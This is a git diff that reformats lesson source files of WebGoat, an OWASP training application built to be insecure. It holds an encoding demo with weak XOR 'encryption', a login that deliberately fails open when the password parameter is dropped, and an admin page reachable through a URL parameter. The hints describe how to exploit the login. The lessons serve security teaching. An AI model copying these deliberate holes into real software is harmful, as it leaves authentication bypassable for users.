-		return ( base64Encode( md.digest() ) );
+		return (base64Encode(md.digest()));
 	}
 
-
-
 	/**
-	 *  Returns the SHA hash of a String.
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Returns the SHA hash of a String.
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String hashSHA( String str )
+	public static String hashSHA(String str)
 	{
 		byte[] b = str.getBytes();
 		MessageDigest md = null;
 		try
 		{
-			md = MessageDigest.getInstance( "SHA-256" );
-			md.update( b );
-		}
-		catch ( NoSuchAlgorithmException e )
+			md = MessageDigest.getInstance("SHA-256");
+			md.update(b);
+		} catch (NoSuchAlgorithmException e)
 		{
 			// it's got to be there
 			e.printStackTrace();
 		}
-		return ( base64Encode( md.digest() ) );
+		return (base64Encode(md.digest()));
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  hexString  Description of the Parameter
-	 * @return            Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param hexString
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String hexDecode( String hexString )
+	public static String hexDecode(String hexString)
 	{
 		try
 		{
-			if ( ( hexString.length() % 3 ) != 0 )
-			{
-				return ( "String not comprised of Hex digit pairs." );
-			}
+			if ((hexString.length() % 3) != 0) { return ("String not comprised of Hex digit pairs."); }
 			char[] chars = new char[hexString.length()];
 			char[] convChars = new char[hexString.length() / 3];
-			hexString.getChars( 0, hexString.length(), chars, 0 );
-			for ( int i = 1; i < hexString.length(); i += 3 )
+			hexString.getChars(0, hexString.length(), chars, 0);
+			for (int i = 1; i < hexString.length(); i += 3)
 			{
-				String hexToken = new String( chars, i, 2 );
-				convChars[i / 3] = (char) Integer.parseInt( hexToken, 16 );
+				String hexToken = new String(chars, i, 2);
+				convChars[i / 3] = (char) Integer.parseInt(hexToken, 16);
 			}
-			return new String( convChars );
-		}
-		catch ( NumberFormatException nfe )
+			return new String(convChars);
+		} catch (NumberFormatException nfe)
 		{
-			return ( "String not comprised of Hex digits" );
+			return ("String not comprised of Hex digits");
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  asciiString  Description of the Parameter
-	 * @return              Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param asciiString
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String hexEncode( String asciiString )
+	public static String hexEncode(String asciiString)
 	{
 		char[] ascii = new char[asciiString.length()];
-		asciiString.getChars( 0, asciiString.length(), ascii, 0 );
+		asciiString.getChars(0, asciiString.length(), ascii, 0);
 		StringBuffer hexBuff = new StringBuffer();
-		for ( int i = 0; i < asciiString.length(); i++ )
+		for (int i = 0; i < asciiString.length(); i++)
 		{
-			hexBuff.append( "%" );
-			hexBuff.append( Integer.toHexString( ascii[i] ) );
+			hexBuff.append("%");
+			hexBuff.append(Integer.toHexString(ascii[i]));
 		}
 		return hexBuff.toString().toUpperCase();
 	}
 
-
-
 	/**
-	 *  The main program for the Encoding class
-	 *
-	 * @param  args  The command line arguments
+	 * The main program for the Encoding class
+	 * 
+	 * @param args
+	 *            The command line arguments
 	 */
 
-	public static void main( String[] args )
+	public static void main(String[] args)
 	{
 		try
 		{
 			String userInput = args[0];
 			String userKey = args[1];
-			System.out.println( "Working with: " + userInput );
-			System.out.print( "Base64 encoding: " );
-			System.out.println( base64Encode( userInput ) + " : " + base64Decode( userInput ) );
-			System.out.print( "Entity encoding: " );
-			System.out.println( HtmlEncoder.encode( userInput ) + " : " + HtmlEncoder.decode( userInput ) );
-			System.out.print( "Password based encryption (PBE): " );
-			System.out.println( encryptString( userInput, userKey ) + " : " + decryptString( userInput, userKey ) );
-			System.out.print( "MD5 hash: " );
-			System.out.println( hashMD5( userInput ) + " : " + "Cannot reverse a hash" );
-			System.out.print( "SHA-256 hash: " );
-			System.out.println( hashSHA( userInput ) + " : " + "Cannot reverse a hash" );
-			System.out.print( "Unicode encoding: " );
-			System.out.println( "Not Implemented" + " : " + "Not Implemented" );
-			System.out.print( "URL encoding: " );
-			System.out.println( urlEncode( userInput ) + " : " + urlDecode( userInput ) );
-			System.out.print( "Hex encoding: " );
-			System.out.println( hexEncode( userInput ) + " : " + hexDecode( userInput ) );
-			System.out.print( "Rot13 encoding: " );
-			System.out.println( rot13( userInput ) + " : " + rot13( userInput ) );
-			System.out.print( "XOR with password: " );
-			System.out.println( xorEncode( userInput, userKey ) + " : " + xorDecode( userInput, userKey ) );
-			System.out.print( "Double unicode encoding is..." );
-			System.out.println( "Not Implemented" + " : " + "Not Implemented" );
-			System.out.print( "Double URL encoding: " );
-			System.out.println( urlEncode( urlEncode( userInput ) ) + " : " + urlDecode( urlDecode( userInput ) ) );
-		}
-		catch ( Exception e )
+			System.out.println("Working with: " + userInput);
+			System.out.print("Base64 encoding: ");
+			System.out.println(base64Encode(userInput) + " : " + base64Decode(userInput));
+			System.out.print("Entity encoding: ");
+			System.out.println(HtmlEncoder.encode(userInput) + " : " + HtmlEncoder.decode(userInput));
+			System.out.print("Password based encryption (PBE): ");
+			System.out.println(encryptString(userInput, userKey) + " : " + decryptString(userInput, userKey));
+			System.out.print("MD5 hash: ");
+			System.out.println(hashMD5(userInput) + " : " + "Cannot reverse a hash");
+			System.out.print("SHA-256 hash: ");
+			System.out.println(hashSHA(userInput) + " : " + "Cannot reverse a hash");
+			System.out.print("Unicode encoding: ");
+			System.out.println("Not Implemented" + " : " + "Not Implemented");
+			System.out.print("URL encoding: ");
+			System.out.println(urlEncode(userInput) + " : " + urlDecode(userInput));
+			System.out.print("Hex encoding: ");
+			System.out.println(hexEncode(userInput) + " : " + hexDecode(userInput));
+			System.out.print("Rot13 encoding: ");
+			System.out.println(rot13(userInput) + " : " + rot13(userInput));
+			System.out.print("XOR with password: ");
+			System.out.println(xorEncode(userInput, userKey) + " : " + xorDecode(userInput, userKey));
+			System.out.print("Double unicode encoding is...");
+			System.out.println("Not Implemented" + " : " + "Not Implemented");
+			System.out.print("Double URL encoding: ");
+			System.out.println(urlEncode(urlEncode(userInput)) + " : " + urlDecode(urlDecode(userInput)));
+		} catch (Exception e)
 		{
 			e.printStackTrace();
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  value1       Description of the Parameter
-	 * @param  value2       Description of the Parameter
-	 * @param  description  Description of the Parameter
-	 * @return              Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param value1
+	 *            Description of the Parameter
+	 * @param value2
+	 *            Description of the Parameter
+	 * @param description
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	private TR makeRow( String description, String value1, String value2 )
+	private TR makeRow(String description, String value1, String value2)
 	{
 
-		TD desc = new TD().addElement( description ).setBgColor( "#bbbbbb" );
-		TD val1 = new TD().addElement( value1 ).setBgColor( "#dddddd" );
-		TD val2 = new TD().addElement( value2 ).setBgColor( "#dddddd" );
+		TD desc = new TD().addElement(description).setBgColor("#bbbbbb");
+		TD val1 = new TD().addElement(value1).setBgColor("#dddddd");
+		TD val2 = new TD().addElement(value2).setBgColor("#dddddd");
 		TR tr = new TR();
 
-		tr.addElement( desc );
-		tr.addElement( val1 );
-		tr.addElement( val2 );
+		tr.addElement(desc);
+		tr.addElement(val1);
+		tr.addElement(val2);
 
 		return tr;
 	}
 
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  value1       Description of the Parameter
-	 * @param  value2       Description of the Parameter
-	 * @param  description  Description of the Parameter
-	 * @return              Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param value1
+	 *            Description of the Parameter
+	 * @param value2
+	 *            Description of the Parameter
+	 * @param description
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	private TR makeTitleRow( String description, String value1, String value2 )
+	private TR makeTitleRow(String description, String value1, String value2)
 	{
-		TD desc = new TD().addElement( new B().addElement( description ) );
-		TD val1 = new TD().addElement( new B().addElement( value1 ) );
-		TD val2 = new TD().addElement( new B().addElement( value2 ) );
-		desc.setAlign( "center" );
-		val1.setAlign( "center" );
-		val2.setAlign( "center" );
+		TD desc = new TD().addElement(new B().addElement(description));
+		TD val1 = new TD().addElement(new B().addElement(value1));
+		TD val2 = new TD().addElement(new B().addElement(value2));
+		desc.setAlign("center");
+		val1.setAlign("center");
+		val2.setAlign("center");
 		TR tr = new TR();
-		tr.addElement( desc );
-		tr.addElement( val1 );
-		tr.addElement( val2 );
-		return ( tr );
+		tr.addElement(desc);
+		tr.addElement(val1);
+		tr.addElement(val2);
+		return (tr);
 	}
 
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  input  Description of the Parameter
-	 * @return        Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param input
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static synchronized String rot13( String input )
+	public static synchronized String rot13(String input)
 	{
 		StringBuffer output = new StringBuffer();
-		if ( input != null )
+		if (input != null)
 		{
-			for ( int i = 0; i < input.length(); i++ )
+			for (int i = 0; i < input.length(); i++)
 			{
-				char inChar = input.charAt( i );
-				if ( ( inChar >= 'A' ) & ( inChar <= 'Z' ) )
+				char inChar = input.charAt(i);
+				if ((inChar >= 'A') & (inChar <= 'Z'))
 				{
 					inChar += 13;
-					if ( inChar > 'Z' )
+					if (inChar > 'Z')
 					{
 						inChar -= 26;
 					}
 				}
-				if ( ( inChar >= 'a' ) & ( inChar <= 'z' ) )
+				if ((inChar >= 'a') & (inChar <= 'z'))
 				{
 					inChar += 13;
-					if ( inChar > 'z' )
+					if (inChar > 'z')
 					{
 						inChar -= 26;
 					}
 				}
-				output.append( inChar );
+				output.append(inChar);
 			}
 		}
 		return output.toString();
 	}
 
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String unicodeDecode( String str )
+	public static String unicodeDecode(String str)
 	{
 		// FIXME: TOTALLY EXPERIMENTAL
 
 		try
 		{
-			ByteBuffer bbuf = ByteBuffer.allocate( str.length() );
-			bbuf.put( str.getBytes() );
-			Charset charset = Charset.forName( "ISO-8859-1" );
+			ByteBuffer bbuf = ByteBuffer.allocate(str.length());
+			bbuf.put(str.getBytes());
+			Charset charset = Charset.forName("ISO-8859-1");
 			CharsetDecoder decoder = charset.newDecoder();
-			CharBuffer cbuf = decoder.decode( bbuf );
-			return ( cbuf.toString() );
-		}
-		catch ( Exception e )
+			CharBuffer cbuf = decoder.decode(bbuf);
+			return (cbuf.toString());
+		} catch (Exception e)
 		{
-			return ( "Encoding problem" );
+			return ("Encoding problem");
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String unicodeEncode( String str )
+	public static String unicodeEncode(String str)
 	{
 		// FIXME: TOTALLY EXPERIMENTAL
 		try
 		{
-			Charset charset = Charset.forName( "ISO-8859-1" );
+			Charset charset = Charset.forName("ISO-8859-1");
 			CharsetEncoder encoder = charset.newEncoder();
-			ByteBuffer bbuf = encoder.encode( CharBuffer.wrap( str ) );
-			return ( new String( bbuf.array() ) );
-		}
-		catch ( Exception e )
+			ByteBuffer bbuf = encoder.encode(CharBuffer.wrap(str));
+			return (new String(bbuf.array()));
+		} catch (Exception e)
 		{
-			return ( "Encoding problem" );
+			return ("Encoding problem");
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String urlDecode( String str )
+	public static String urlDecode(String str)
 	{
 		try
 		{
-			return ( URLDecoder.decode( str, "UTF-8" ) );
-		}
-		catch ( Exception e )
+			return (URLDecoder.decode(str, "UTF-8"));
+		} catch (Exception e)
 		{
-			return ( "Decoding error" );
+			return ("Decoding error");
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String urlEncode( String str )
+	public static String urlEncode(String str)
 	{
 		try
 		{
-			return ( URLEncoder.encode( str, "UTF-8" ) );
-		}
-		catch ( Exception e )
+			return (URLEncoder.encode(str, "UTF-8"));
+		} catch (Exception e)
 		{
-			return ( "Encoding error" );
+			return ("Encoding error");
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  input    Description of the Parameter
-	 * @param  userKey  Description of the Parameter
-	 * @return          Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param input
+	 *            Description of the Parameter
+	 * @param userKey
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static synchronized char[] xor( String input, String userKey )
+	public static synchronized char[] xor(String input, String userKey)
 	{
-		if ( ( userKey == null ) || ( userKey.trim().length() == 0 ) )
+		if ((userKey == null) || (userKey.trim().length() == 0))
 		{
 			userKey = "Goober";
 		}
@@ -818,58 +787,57 @@ public class Encoding extends LessonAdapter
 		int keyLen = xorChars.length;
 		char[] inputChars = null;
 		char[] outputChars = null;
-		if ( input != null )
+		if (input != null)
 		{
 			inputChars = input.toCharArray();
 			outputChars = new char[inputChars.length];
-			for ( int i = 0; i < inputChars.length; i++ )
+			for (int i = 0; i < inputChars.length; i++)
 			{
-				outputChars[i] = (char) ( inputChars[i] ^ xorChars[i % keyLen] );
+				outputChars[i] = (char) (inputChars[i] ^ xorChars[i % keyLen]);
 			}
 		}
 		return outputChars;
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  input    Description of the Parameter
-	 * @param  userKey  Description of the Parameter
-	 * @return          Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param input
+	 *            Description of the Parameter
+	 * @param userKey
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static synchronized String xorDecode( String input, String userKey )
+	public static synchronized String xorDecode(String input, String userKey)
 	{
 		try
 		{
-			String decoded = base64Decode( input );
-			return new String( xor( decoded, userKey ) );
-		}
-		catch ( Exception e )
+			String decoded = base64Decode(input);
+			return new String(xor(decoded, userKey));
+		} catch (Exception e)
 		{
 			return "String not XOR encoded.";
 		}
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  input    Description of the Parameter
-	 * @param  userKey  Description of the Parameter
-	 * @return          Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param input
+	 *            Description of the Parameter
+	 * @param userKey
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static synchronized String xorEncode( String input, String userKey )
+	public static synchronized String xorEncode(String input, String userKey)
 	{
-		return base64Encode( xor( input, userKey ) );
+		return base64Encode(xor(input, userKey));
 	}
 
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java b/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java
index d3d703804..a1bae71dd 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/FailOpenAuthentication.java
@@ -1,193 +1,184 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.html.A;
 import org.apache.ecs.html.IMG;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class FailOpenAuthentication extends WeakAuthenticationCookie
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-	if (logout)
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    s.setMessage("Goodbye!");
-	    s.eatCookies();
+		boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
 
-	    return (makeLogin(s));
-	}
-
-	try
-	{
-	    String username = "";
-	    String password = "";
-
-	    try
-	    {
-		username = s.getParser().getRawParameter(USERNAME);
-		password = s.getParser().getRawParameter(PASSWORD);
-
-		// if credentials are bad, send the login page
-		if (!"webgoat".equals(username) || !password.equals("webgoat"))
+		if (logout)
 		{
-		    s.setMessage("Invalid username and password entered.");
+			s.setMessage("Goodbye!");
+			s.eatCookies();
 
-		    return (makeLogin(s));
+			return (makeLogin(s));
 		}
-	    }
-	    catch (Exception e)
-	    {
-		// The parameter was omitted. set fail open status complete
-		if (username.length() > 0
-			&& e.getMessage().indexOf("not found") != -1)
-		{
-		    if ((username != null) && (username.length() > 0))
-		    {
-			makeSuccess(s);
-			return (makeUser(s, username,
-				"Fail Open Error Handling"));
-		    }
-		}
-	    }
 
-	    // Don't let the fail open pass with a blank password.
-	    if (password.length() == 0)
-	    {
-		// We make sure the username was submitted to avoid telling the user an invalid
-		// username/password was entered when they first enter the lesson via the side menu.
-		// This also suppresses the error if they just hit the login and both fields are empty.
-		if (username.length() != 0)
+		try
 		{
-		    s.setMessage("Invalid username and password entered.");
+			String username = "";
+			String password = "";
+
+			try
+			{
+				username = s.getParser().getRawParameter(USERNAME);
+				password = s.getParser().getRawParameter(PASSWORD);
+
+				// if credentials are bad, send the login page
+				if (!"webgoat".equals(username) || !password.equals("webgoat"))
+				{
+					s.setMessage("Invalid username and password entered.");
+
+					return (makeLogin(s));
+				}
+			} catch (Exception e)
+			{
+				// The parameter was omitted. set fail open status complete
+				if (username.length() > 0 && e.getMessage().indexOf("not found") != -1)
+				{
+					if ((username != null) && (username.length() > 0))
+					{
+						makeSuccess(s);
+						return (makeUser(s, username, "Fail Open Error Handling"));
+					}
+				}
+			}
+
+			// Don't let the fail open pass with a blank password.
+			if (password.length() == 0)
+			{
+				// We make sure the username was submitted to avoid telling the user an invalid
+				// username/password was entered when they first enter the lesson via the side menu.
+				// This also suppresses the error if they just hit the login and both fields are
+				// empty.
+				if (username.length() != 0)
+				{
+					s.setMessage("Invalid username and password entered.");
+				}
+
+				return (makeLogin(s));
+
+			}
+
+			// otherwise authentication is good, show the content
+			if ((username != null) && (username.length() > 0)) { return (makeUser(s, username,
+																					"Parameters.  You did not exploit the fail open.")); }
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
 		}
 
 		return (makeLogin(s));
-
-	    }
-
-	    // otherwise authentication is good, show the content
-	    if ((username != null) && (username.length() > 0))
-	    {
-		return (makeUser(s, username,
-			"Parameters.  You did not exploit the fail open."));
-	    }
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the category attribute of the FailOpenAuthentication object
+	 * 
+	 * @return The category value
+	 */
+	public Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
+		return Category.ERROR_HANDLING;
 	}
 
-	return (makeLogin(s));
-    }
+	/**
+	 * Gets the hints attribute of the AuthenticateScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("You can force errors during the authentication process.");
+		hints.add("You can change length, existance, or values of authentication parameters.");
+		hints
+				.add("Try removing a parameter ENTIRELY with <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A>.");
 
+		return hints;
+	}
 
-    /**
-     *  Gets the category attribute of the FailOpenAuthentication object
-     *
-     * @return    The category value
-     */
-    public Category getDefaultCategory()
-    {
-	return Category.ERROR_HANDLING;
-    }
+	/**
+	 * Gets the instructions attribute of the FailOpenAuthentication object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate "
+				+ "as the 'webgoat' user without entering a password.  Try to login as the webgoat user without "
+				+ "specifying a password.";
+	}
 
+	private final static Integer DEFAULT_RANKING = new Integer(20);
 
-    /**
-     *  Gets the hints attribute of the AuthenticateScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("You can force errors during the authentication process.");
-	hints
-		.add("You can change length, existance, or values of authentication parameters.");
-	hints
-		.add("Try removing a parameter ENTIRELY with <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A>.");
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-	return hints;
-    }
+	/**
+	 * Gets the title attribute of the AuthenticateScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Fail Open Authentication Scheme");
+	}
 
-
-    /**
-     *  Gets the instructions attribute of the FailOpenAuthentication object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate "
-		+ "as the 'webgoat' user without entering a password.  Try to login as the webgoat user without "
-		+ "specifying a password.";
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(20);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the AuthenticateScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Fail Open Authentication Scheme");
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java
index c457b097b..7cfef80ca 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -16,138 +16,135 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    November 02, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created November 02, 2006
  */
 public class ForcedBrowsing extends LessonAdapter
 {
 
-    private final static String SUCCEEDED = "succeeded";
+	private final static String SUCCEEDED = "succeeded";
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-		String success = new String(s.getParser().getStringParameter(SUCCEEDED,""));
-		
+		String success = new String(s.getParser().getStringParameter(SUCCEEDED, ""));
+
 		if (success.length() != 0 && success.equals("yes"))
 		{
-		    ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page")));
-		    ec.addElement(new BR());
-		    Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
-		
-		    TR tr = new TR();
-		    tr.addElement(new TD(new StringElement("Set Admin Privileges for: ")));
-		
-		    Input input1 = new Input(Input.TEXT, "", "");
-		    tr.addElement(new TD(input1));
-		    t1.addElement(tr);
-		
-		    tr = new TR();
-		    tr.addElement(new TD(new StringElement("Set Admin Password:")));
-		
-		    input1 = new Input(Input.PASSWORD, "", "");
-		    tr.addElement(new TD(input1));
-		    t1.addElement(tr);
-		
-		    Element b = ECSFactory.makeButton("Submit");
-		    t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right")));
-		    ec.addElement(t1);
-		
-		    makeSuccess(s);
+			ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page")));
+			ec.addElement(new BR());
+			Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
+
+			TR tr = new TR();
+			tr.addElement(new TD(new StringElement("Set Admin Privileges for: ")));
+
+			Input input1 = new Input(Input.TEXT, "", "");
+			tr.addElement(new TD(input1));
+			t1.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD(new StringElement("Set Admin Password:")));
+
+			input1 = new Input(Input.PASSWORD, "", "");
+			tr.addElement(new TD(input1));
+			t1.addElement(tr);
+
+			Element b = ECSFactory.makeButton("Submit");
+			t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right")));
+			ec.addElement(t1);
+
+			makeSuccess(s);
 		}
 		else
 		{
-		    ec.addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel.");
+			ec
+					.addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel.");
 		}
 		return ec;
-    }
+	}
 
+	/**
+	 * Gets the category attribute of the ForgotPassword object
+	 * 
+	 * @return The category value
